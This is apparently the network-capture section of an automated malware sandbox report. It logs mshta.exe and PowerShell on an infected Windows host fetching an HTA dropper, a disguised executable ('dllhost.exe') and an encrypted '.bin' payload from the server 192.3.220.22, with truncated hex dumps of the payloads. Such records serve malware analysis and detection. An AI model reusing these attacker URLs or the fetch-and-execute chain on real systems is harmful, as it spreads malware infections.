                                                                            Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                            Sep 30, 2024 09:53:25.270447969 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                            Sep 30, 2024 09:53:25.275409937 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            1 | 192.168.2.22 | 49166 | 192.3.220.22 | 80 | 3924 | C:\Windows\System32\mshta.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Sep 30, 2024 09:53:27.476290941 CEST | 431 | OUT | GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Language: en-US
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Range: bytes=8896-
                                                                            Connection: Keep-Alive
                                                                            Host: 192.3.220.22
                                                                            If-Range: "1ceb2-62345be2e2e61"
                                                                            Sep 30, 2024 09:53:27.893821001 CEST | 1236 | IN | HTTP/1.1 206 Partial Content
                                                                            Date: Mon, 30 Sep 2024 07:53:27 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 17:51:50 GMT
                                                                            ETag: "1ceb2-62345be2e2e61"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 109554
                                                                            Content-Range: bytes 8896-118449/118450
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/hta
                                                                            Data Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 [TRUNCATED]
                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                            Sep 30, 2024 09:53:27.893845081 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                            Sep 30, 2024 09:53:27.893856049 CEST448INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                            Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                            Sep 30, 2024 09:53:27.893866062 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                            Sep 30, 2024 09:53:27.893877983 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                            Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                            Sep 30, 2024 09:53:27.893887997 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                            Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                            Sep 30, 2024 09:53:27.893910885 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                            Sep 30, 2024 09:53:27.893923044 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                            Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                            Sep 30, 2024 09:53:27.893933058 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                            Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                            Sep 30, 2024 09:53:27.893944979 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                            Sep 30, 2024 09:53:27.898921013 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                            Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            2 | 192.168.2.22 | 49167 | 192.3.220.22 | 80 | 4032 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Sep 30, 2024 09:53:34.034559965 CEST | 334 | OUT | GET /430/dllhost.exe HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: 192.3.220.22
                                                                            Connection: Keep-Alive
                                                                            Sep 30, 2024 09:53:34.512454033 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Date: Mon, 30 Sep 2024 07:53:33 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 19:50:50 GMT
                                                                            ETag: "f1e30-6234767b79a80"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 990768
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/lnk
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 27 95 75 59 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 2a 02 00 00 08 00 00 3d 33 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 0c 00 00 04 00 00 37 2f 0f 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 [TRUNCATED]
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPEL'uYd*=3@7/@.textmbd `.rdatah@@.data|@.ndata.rsrc@@
                                                                            Sep 30, 2024 09:53:34.512480974 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: U\}t+}FEuHBHPuuu@BSV5BEWPu @eEEPu$@}e\@FRVVU+M
                                                                            Sep 30, 2024 09:53:34.512492895 CEST1236INData Raw: 8b f0 89 4d f4 8d 4d d8 c1 e6 0b 89 0d a8 cd 40 00 8d 4a fe 03 f7 83 f9 43 89 5d fc 0f 87 35 16 00 00 ff 24 8d d1 2a 40 00 53 50 e8 18 3e 00 00 e9 54 0e 00 00 ff 05 cc 91 42 00 39 5d f8 0f 84 45 0e 00 00 53 ff 15 94 82 40 00 e9 39 0e 00 00 50 e8
                                                                            Data Ascii: MM@JC]5$*@SP>TB9]ES@9PHSPSP=S8YU3@Px@ud@9]u&BjBYUMBBB}E4B3;#MD
                                                                            Sep 30, 2024 09:53:34.512505054 CEST1236INData Raw: e9 89 11 00 00 6a f0 e8 ef 12 00 00 ff 75 dc 50 e8 09 40 00 00 e9 69 11 00 00 6a 01 e8 da 12 00 00 50 e8 ff 48 00 00 e9 24 0c 00 00 6a 02 e8 a6 12 00 00 6a 03 89 45 b0 89 55 b4 e8 99 12 00 00 59 8b f8 8b 45 b0 59 6a 01 89 7d cc 89 55 d0 89 45 08
                                                                            Data Ascii: juP@ijPH$jjEUYEYj}UEPEH9]fuE9]M;}<;;~ExPVwH9]}VHEy]E=fFj 1j1(9]PVu@uzE@
                                                                            Sep 30, 2024 09:53:34.512516975 CEST1236INData Raw: 01 88 0d c4 cd 40 00 8a c8 80 e1 02 24 04 68 cc cd 40 00 88 0d c5 cd 40 00 a2 c6 cd 40 00 e8 3b 44 00 00 68 b0 cd 40 00 ff 15 54 80 40 00 e9 49 07 00 00 53 e8 cc 0d 00 00 6a 01 8b f0 89 55 b4 e8 c0 0d 00 00 39 5d e4 59 59 89 55 b4 50 56 75 0b ff
                                                                            Data Ascii: @$h@@@;Dh@T@ISjU9]YYUPVuh@S@HSj1j"jjEEEEEEff]#EffE`C#E|P9E@uGuGS1
                                                                            Sep 30, 2024 09:53:34.512526989 CEST1120INData Raw: e8 53 e8 83 3f 00 00 50 e8 bd 35 00 00 b8 ff ff ff 7f e9 cf 07 00 00 ff 05 b4 a2 42 00 e9 b9 07 00 00 33 f6 33 ff 3b c3 74 08 53 e8 23 09 00 00 8b f0 39 5d dc 74 09 6a 11 e8 15 09 00 00 8b f8 39 5d e8 74 09 6a 22 e8 07 09 00 00 8b d8 6a cd e8 fe
                                                                            Data Ascii: S?P5B33;tS#9]tj9]tj"jPSWVd@l@jEjjEPhEVPuW`@f>9]uu+j;j3PV @V$@j"uMQPV&;
                                                                            Sep 30, 2024 09:53:34.512540102 CEST1236INData Raw: 00 00 00 8d 45 bc 6a 02 50 ff 75 f0 e8 6c 36 00 00 85 c0 74 7d 8b 45 bc 39 5d e4 75 31 66 83 7d d0 0d 74 3b 66 83 7d d0 0a 74 34 8b 4d f4 8b 55 f8 ff 45 f8 66 3b c3 66 89 04 51 89 45 d0 74 52 8b 45 f8 3b 45 c4 0f 8c 03 ff ff ff eb 44 0f b7 c0 50
                                                                            Data Ascii: EjPul6t}E9]u1f}t;f}t4MUEf;fQEtRE;EDPu9%f9Etf=tf=uMUEfQEjSPuD@ME;fAf9jYUuSPV9PD@9]FV9;PL@u
                                                                            Sep 30, 2024 09:53:34.512552977 CEST1236INData Raw: 04 8b 0d a8 cd 40 00 56 ff 34 81 6a 00 e8 44 36 00 00 8b f0 56 e8 7a 35 00 00 0f b7 16 5e c3 56 8b 74 24 08 85 f6 57 8b c6 7d 02 f7 d8 8b 15 a8 cd 40 00 8b c8 83 e1 0f c1 f8 04 ff 34 8a c1 e0 0b 05 a8 a5 40 00 50 e8 0a 36 00 00 85 f6 8b f8 7d 06
                                                                            Data Ascii: @V4jD6Vz5^Vt$W}@4@P6}Wp8_^UEPE Pj"P@pP4#E]D$|BUEPE PuuP3#E]UM EPu
                                                                            Sep 30, 2024 09:53:34.512615919 CEST1236INData Raw: e8 08 2c 00 00 33 c0 5f 5e 5b c9 c2 04 00 55 8b ec 81 ec 90 00 00 00 53 56 8b 75 14 57 8b 7d 10 89 75 f8 85 ff 75 07 c7 45 f8 00 80 00 00 83 65 fc 00 8b df 85 ff 75 05 bb a0 0e 41 00 8b 45 08 85 c0 7c 0e 8b 0d 78 a2 42 00 03 c8 51 e8 b7 01 00 00
                                                                            Data Ascii: ,3_^[USVuW}uuEeuAE|xBQEjPEE$|@@E6eEET@9u}u@VWE)u=(@5,@E@0@4@5E50@+|
                                                                            Sep 30, 2024 09:53:34.512626886 CEST1236INData Raw: 8b 35 70 80 40 00 57 68 90 a2 40 00 ff d6 57 68 88 a2 40 00 ff d6 e8 31 fd ff ff 85 c0 0f 84 cb 00 00 00 68 00 70 43 00 ff 15 40 81 40 00 ff 74 24 1c e8 ca f8 ff ff 3b c3 89 44 24 10 0f 85 ab 00 00 00 39 1d 20 a2 42 00 0f 84 8f 00 00 00 53 55 e8
                                                                            Data Ascii: 5p@Wh@Wh@1hpC@@t$;D$9 BSU4%;rL@@|@~@3;uV;tNN;s3;D$@rffV%t*VhXC+Vh`C+\$BD$
                                                                            Sep 30, 2024 09:53:34.517575026 CEST1236INData Raw: 50 55 e8 b1 27 00 00 55 e8 84 21 00 00 85 c0 75 0c ff b6 18 01 00 00 55 e8 bd 27 00 00 68 40 80 00 00 57 57 6a 01 6a 67 ff 35 00 a2 42 00 ff 15 60 82 40 00 a3 e8 91 42 00 83 7e 50 ff bb a0 91 42 00 74 7f 8b 0d 00 a2 42 00 be 80 a3 40 00 53 c7 05
                                                                            Data Ascii: PU'U!uU'h@WWjjg5B`@B~PBtB@SB@BB5B4@fD$WPWj08@W5BD$$+D$WWPD$,+D$$Pt$,t$,hWVh<@6BWtjX9=Bj56Bh@


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            3 | 192.168.2.22 | 49172 | 192.3.220.22 | 80 | 1852 | C:\Windows\System32\mshta.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Sep 30, 2024 09:53:49.574035883 CEST | 466 | OUT | GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Language: en-US
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            If-Modified-Since: Sun, 29 Sep 2024 17:51:50 GMT
                                                                            Connection: Keep-Alive
                                                                            Host: 192.3.220.22
                                                                            If-None-Match: "1ceb2-62345be2e2e61"
                                                                            Sep 30, 2024 09:53:50.060250044 CEST | 275 | IN | HTTP/1.1 304 Not Modified
                                                                            Date: Mon, 30 Sep 2024 07:53:49 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 17:51:50 GMT
                                                                            ETag: "1ceb2-62345be2e2e61"
                                                                            Accept-Ranges: bytes
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            4 | 192.168.2.22 | 49173 | 192.3.220.22 | 80 | 924 | C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Sep 30, 2024 09:56:14.202555895 CEST | 179 | OUT | GET /hFXELFSwRHRwqbE214.bin HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: 192.3.220.22
                                                                            Cache-Control: no-cache
                                                                            Sep 30, 2024 09:56:14.719575882 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Date: Mon, 30 Sep 2024 07:56:13 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 22:47:51 GMT
                                                                            ETag: "78c40-62349e0caa82a"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 494656
                                                                            Content-Type: application/octet-stream
                                                                            Data Raw: 4e a0 96 ff 79 3e 6e 05 34 71 21 6e e1 21 b3 d3 89 05 24 c0 68 72 32 b6 27 8a fa 2f a4 d2 30 70 b0 60 2e b2 48 53 fa 14 95 ef c8 19 07 86 19 d0 48 ef b0 c8 59 6a d5 c0 8b 6c 17 6a 57 54 63 f5 f0 c3 db 7c d2 0e db 7c d1 78 ee 47 7e a8 1f b6 d1 ae 8a d8 da bb 54 e2 ff 93 b8 ad 09 6c 87 4b a2 ed f4 5d a0 73 88 ad ae 42 80 39 24 83 72 2e 43 b0 ae 05 a8 f0 9b 12 3d 08 9b 96 8c 2d 42 27 6e c4 a5 e1 c8 12 d8 1f 30 6b 99 d6 6e d4 15 a5 92 d0 2a 76 f4 45 77 84 ef 33 2a f1 7d e7 f3 ed f8 36 f6 79 a7 25 3a 90 ff b8 f5 64 38 94 3a 3f fe ee a4 50 8c c5 d8 d3 49 21 69 83 d0 70 86 ff db 86 c5 4c d9 bb 26 3d ef 54 f3 c6 21 b3 26 60 be 03 f4 3a 08 7c 6b 8a dc 89 14 ac 86 11 35 44 93 fb 9e a6 ca b5 94 d6 be 8a 1b a2 75 2a 49 15 2f 07 e0 b9 53 a8 66 19 37 2b ad e8 42 c5 1f a9 9b 58 f4 e3 ea 38 d9 f3 17 5c 86 f4 d7 4e f4 fc 5f 6b 38 be 5d af 09 f6 37 53 44 25 2a ab 2b f4 4c b8 12 af 4c 49 e3 78 50 99 a0 c6 03 ca ee 3d 36 c3 09 41 3c ad 25 00 3e d4 f4 cb 4d 4c aa d7 de 79 35 75 e7 00 e0 5b 89 7d ed cf 20 dc c1 36 a9 a4 [TRUNCATED]
                                                                            Data Ascii: Ny>n4q!n!$hr2'/0p`.HSHYjljWTc||xG~TlK]sB9$r.C=-B'n0kn*vEw3*}6y%:d8:?PI!ipL&=T!&`:|k5Du*I/Sf7+BX8\N_k8]7SD%*+LLIxP=6A<%>MLy5u[} 6_:7dr`0qC_|_I^<D(o%dj*qJx)<,VD$9yD+<}4Ht:Qo'}u-p"=5Z}gBc?O%G^2>kiJTsToX5AJ3R0]uNL't~ahZ,z{3B*YK!TtbG4SoR>+hy]>r`?t#H%h>=+&0l.LbR13ST(u2`hN5^M%"UPA7FgMLE^NlJBQL{\(l*~hN$R-EgHg]/11ONoi|RqvAGJnDb$.1Z!v.%UBj{l0'j*v'S`}F;&RT-FfkR8^9UJs>HD%C#d
                                                                            Sep 30, 2024 09:56:14.719618082 CEST1236INData Raw: 7a c6 25 bd 9b a9 7e 31 df 9f 22 d3 d7 90 9b b7 fe 66 df 4d 36 a9 cc 83 9f d6 42 22 c3 2b cf 1d d8 62 32 05 a8 f1 7e 6d 61 82 bf 00 42 c1 5b 0f 86 af 0a d7 a5 af d3 7a ce f2 f3 24 8b 14 2c 0c 83 88 22 98 45 31 87 b8 7b 28 9c 9b 90 25 84 58 e5 ed
                                                                            Data Ascii: z%~1"fM6B"+b2~maB[z$,"E1{(%X[n~vsgsK@<$f%.I9p?@OyL`]Vb:/4]BIf<I0qji"/c=E:P69;'&Jw]!+$
                                                                            Sep 30, 2024 09:56:14.719635963 CEST1236INData Raw: 1e 20 2f a7 19 c4 4c 95 2a 49 df 97 4e 84 18 79 84 42 08 00 f5 ab c4 1b 82 c0 bf 60 d7 19 02 15 86 8d c5 e4 99 88 93 ec 4d 1e eb 6c 5f 90 24 2a b8 8b 2d ff 8e 11 16 e8 a5 ad 73 9d 64 b8 11 a4 37 2f 88 51 68 dd d7 2c 40 f0 c8 cc b2 8c 14 bc 4e 87
                                                                            Data Ascii: /L*INyB`Ml_$*-sd7/Qh,@N%q`=lv)H-DJgnZ(!,.,YBzTg0KH5z+i}33`cy;O+R..8QJjA=H!>CVyMV~!SW{2eOSHob
                                                                            Sep 30, 2024 09:56:14.719649076 CEST672INData Raw: 1f 1e b8 27 f9 cf b4 87 79 3a b3 e5 44 82 ed 53 19 54 07 74 86 6d 5c 76 88 93 9c 5d f3 90 f7 4e c4 91 1a 9c 47 3b fb 64 53 11 d8 9a 38 c3 8e 94 40 d4 4a a1 27 c9 fa 7f 6b 1d 57 ad 6a b5 ec 6a 50 49 26 d6 e8 f4 e6 c0 57 2a 82 20 9b 9b 26 1d 5a d6
                                                                            Data Ascii: 'y:DSTtm\v]NG;dS8@J'kWjjPI&W* &ZuK!Tz8YTvganyJ_fP{$8p%=+H,.L2Ebc'(r<!y2/\ON5 "hPd]{ /%yB\j((Wln
                                                                            Sep 30, 2024 09:56:14.719660044 CEST1236INData Raw: bc ba 25 1a d6 ec 41 b4 09 f7 a6 8e 75 e8 27 38 be 35 ed d3 ee 3d f7 ed c4 17 64 83 a5 11 cf a1 40 95 60 a1 39 ee 73 08 3a da 13 f6 3e d0 50 48 d6 df ec 6a 5a 1f 72 b3 35 5e 2c 29 e0 d3 89 01 b0 74 20 90 77 a0 4c 2d 72 8f 9c 76 22 d9 09 25 dc 76
                                                                            Data Ascii: %Au'85=d@`9s:>PHjZr5^,)t wL-rv"%vh uC?&f6^?3g.#7H2O P2_5gRM)UDX2QJF);3VxJ_G05gSzG{yP_xW>
                                                                            Sep 30, 2024 09:56:14.719666004 CEST1236INData Raw: 79 3d cc a3 17 2c 0c 7c fc 06 90 ce ff 6f 84 7f 28 9c 10 56 7b 46 5c e5 bb 83 aa 86 27 f7 df 76 19 67 74 c0 72 5a 45 ee b2 73 ad f2 75 e8 47 cb 61 f8 71 18 f6 3b df fc 24 66 02 e3 70 8b 86 d3 cd b2 81 17 b7 64 0d 56 25 91 5a 91 57 ae 2f e5 20 b2
                                                                            Data Ascii: y=,|o(V{F\'vgtrZEsuGaq;$fpdV%ZW/ }o|c QY>~f\'xQ:.vKu=)C5T<RB{W[h_Un=8,jaM~+B.5g\4 Y;9}
                                                                            Sep 30, 2024 09:56:14.719671011 CEST448INData Raw: b4 94 e3 6f ef a0 6c 5e 2f 31 2e 44 8a 5c 89 1c 95 20 f6 de 23 95 72 96 e4 6f 9f 87 c0 09 a7 85 75 eb 7a 9e d8 43 1a 0e a9 b8 14 e5 57 38 71 1e 98 ef 89 14 e6 6e 62 65 62 bf 5a 1f 15 e1 02 8b a5 49 2d 06 aa 72 ee 12 19 d0 0d 53 a4 2b f5 22 90 46
